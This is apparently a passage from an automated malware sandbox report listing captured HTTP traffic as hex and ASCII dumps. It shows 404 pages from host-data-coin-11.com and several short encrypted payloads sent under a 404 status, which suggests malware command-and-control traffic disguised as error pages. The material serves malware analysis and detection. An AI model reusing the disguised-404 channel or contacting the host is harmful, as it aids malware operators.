                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:43:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 02 e9 1a d1 70 ae 59 4a d9 52 a6 be 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOjpYJRg%XQAc}yc0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:43:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:43:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:43:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:43:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:43:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:43:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:43:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:43:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 11 Jan 2022 19:42:42 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
